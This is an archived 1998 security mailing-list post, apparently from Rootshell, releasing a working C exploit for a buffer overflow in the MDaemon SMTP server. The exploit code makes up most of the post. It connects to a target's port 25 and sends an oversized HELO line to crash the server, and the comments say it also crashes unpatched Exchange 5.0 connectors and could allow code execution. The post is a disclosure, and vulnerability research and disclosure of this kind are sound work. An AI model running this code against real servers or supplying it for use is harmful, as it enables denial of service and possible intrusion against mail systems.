[ forwarded from rootshell ] Since a similar bug was just released about the MDaemon Config Manager on Bugtraq, we decided to release our MDaemon exploit early. After the exploit you will find the original Bugtraq post. Note that MDaemon has known about this bug since February. Look for our upcoming paper on SMTP server security. /* * MDaemon SMTP server for Windows buffer overflow exploit * * http://www.mdaemon.com - if you dare... * * Tested on MDaemon 2.71 SP1 * * http://www.rootshell.com/ * * Released 3/10/98 * * (C) 1998 Rootshell All Rights Reserved * * For educational use only. Distribute freely. * * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail * connector if SP2 has NOT been installed. * * Danger! * * A malicous user could use this bug to execute arbitrary code on the * remote system. * */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <stdlib.h> #include <unistd.h> void main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *hp; char *buffer; int sock, i; if (argc != 2) { printf("usage: %s <smtp server>\n", argv[0]); exit(1); } hp = gethostbyname(argv[1]); if (hp==NULL) { printf("Unknown host: %s\n",argv[1]); exit(1); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(25); sock = socket(AF_INET, SOCK_STREAM, 0); connect(sock,(struct sockaddr *) &sin, sizeof(sin)); buffer = (char *)malloc(10000); sprintf(buffer, "HELO "); for (i = 0; i<4096; i++) strcat(buffer, "x"); strcat(buffer, "\r\n"); write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); } -- cut here -- Rootshell Note: The config manager appears to run on port 8081 and is configurable. In the version that we tested (2.71 SP1) this buffer overflow did not exist in the remote config manager, and required a remote version of 3.7 and not 3.0.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:48 PDT